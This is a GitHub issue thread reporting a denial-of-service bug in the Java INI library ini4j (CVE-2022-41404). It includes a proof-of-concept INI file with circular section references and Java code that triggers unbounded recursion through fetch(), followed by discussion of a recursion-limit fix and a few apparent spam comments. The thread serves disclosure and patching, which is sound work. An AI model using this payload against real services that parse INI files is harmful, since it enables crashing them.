#56 The package org.ini4j before 0.5.4 are vulnerable to get value via the fetch() method in BasicProfile class, which may lead to DoS attacks.

[bingdian]

Test logic usable to reproduce the behaviour
payload:
----payload.ini

[dopey]
 weight = ${bashful/weight}
 height = ${doc/height}

[bashful]
 weight = ${dopey/weight}
 height = ${dopey/height}

 [doc]
 weight = 49.5
 height = 87.7

----java poc

        Ini ini = new Ini();
        ini.load(new FileReader(new File("/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini"))
        );
        ini.get("dopey").fetch("weight");

[Salvatore Bonaccorso]

@szkiba, @bingdian: the description mentions that the issue is present before version 0.5.4. Can you elaborate where the issue was fixed landing in that version?

[Bogdan]

[Marc Lafon]

I have taken a quick look to the source code, the problem seem to come from the recursive calls from the BasicProfileSection.fetch and BasicProfile.resolve methods... recursive loop is still present in version 0.54, without any limitation.

[paradox]

I tried to limit the number of recursions.
Can this modification solve the above problem?

https://github.com/SuperMap/ini4j/commit/917865af0244c32fafe9939fe69af6577f9a6077

[Craig]

This issue was assigned CVE-2022-41404..

It would be great to resolve this issue - can the project maintainer please accept the requested change and make a release?

[Layne]

Yeah I also have to use it in Remini mod apk. can you confirm?

[GBWhatsapp pro]